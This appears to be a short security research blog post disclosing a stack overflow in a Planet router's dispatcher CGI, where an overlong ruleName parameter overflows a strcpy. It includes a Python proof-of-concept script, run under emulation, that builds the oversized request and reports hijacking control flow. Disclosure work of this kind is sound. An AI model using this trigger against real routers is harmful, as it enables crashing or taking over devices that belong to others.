web_acl_mgmt_Rules_Apply_post-ruleName

web_acl_mgmt_Rules_Apply_post-ruleName

During my internship at Qi An Xin Tiangong Lab, I discovered a stack overflow vulnerability in the Planet router.

By analyzing the dispatcher file in the bin directory, I found that the function web_acl_mgmt_Rules_Apply_post contains a stack overflow vulnerability.

The stack overflow can be triggered by ruleNamekey value, which leads to a strcpy stack overflow.

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In the main function, there is an account authentication detection. We create a cookie_0 in the tmp directory, with the content of “20 0 0”, and its function is to create a cookie with sufficient permissions to access this route.

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20 0 0

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The content of the poc.py file is as follows:

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import os


a = 0x2304
var_name = "ruleName"
b = 'a' * 0x500


poc_content = f"&cmd={a}&{var_name}={b}"
with open('poc', 'w') as f:
f.write(poc_content)

command = (
"sudo chroot . ./qemu-mips-static "
"-E REQUEST_METHOD=POST "
"-E HTTP_COOKIE='hid=0' "
"-L ./lib "
"-g 1234 "
"./dispatcher.cgi "
"< poc"
)


os.system(command)

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Through the above image, we can see that we have overflowed to 0x450 and successfully hijacked the control flow. If necessary, more can be overflowed.


web_acl_mgmt_Rules_Apply_post-ruleName
https://lafdrew.github.io/2025/04/20/web-acl-mgmt-Rules-Apply-post-ruleName/
Author
John Doe
Posted on
April 20, 2025
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